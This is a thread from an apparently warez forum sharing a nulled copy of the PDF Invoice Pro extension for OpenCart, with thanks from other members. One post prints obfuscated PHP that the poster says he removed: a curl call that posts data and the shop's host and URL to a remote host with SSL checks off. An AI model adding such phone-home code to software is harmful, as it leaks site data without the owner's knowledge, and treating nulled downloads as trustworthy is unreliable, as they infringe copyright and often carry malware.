PDF Invoice Pro version 3.0.9 - for Opencart 3.x

vyper

Well-known member
Elite
XNullUser
Joined
Aug 13, 2024
Messages
35
Reaction score
250
Points
53
Location
internet
NullCash
1,991

Attachments

  • pdfinvoiceprov3.0.9.ocmod.zip
    3.3 MB · Views: 15
  • pdf_invoice_pro_v3.4.2.zip
    3.7 MB · Views: 11
Last edited by a moderator:

liwya2021

Member
XNullUser
Joined
Aug 21, 2021
Messages
157
Reaction score
17
Points
18
NullCash
7
Who has PDF Invoice Pro for OpenCart v3.4.2? Thank you
 

vyper

Well-known member
Elite
XNullUser
Joined
Aug 13, 2024
Messages
35
Reaction score
250
Points
53
Location
internet
NullCash
1,991
PDF Invoice Pro v3.42 Nulled for Opencart 2x, 3x
Because this version has some obuscatd code... I have compared with 3.0.9 and I have removed that code


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://wen/apis.php"); // INSECURE: remote host
curl_setopt($ch, CURLOPT_REFERER, "http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/...");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post));
// WARNING: SSL verify disabled in orig; if using HTTPS, do NOT disable in production.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
 

Attachments

  • pdf_invoice_pro_v3.4.2.zip
    3.7 MB · Views: 11

liwya2021

Member
XNullUser
Joined
Aug 21, 2021
Messages
157
Reaction score
17
Points
18
NullCash
7
Thank you very much to the author for the module.
 

pr88

Member
XNullUser
Joined
Mar 30, 2020
Messages
215
Reaction score
0
Points
16
NullCash
67
Thanks you so much for sharing this useful module.
 
Top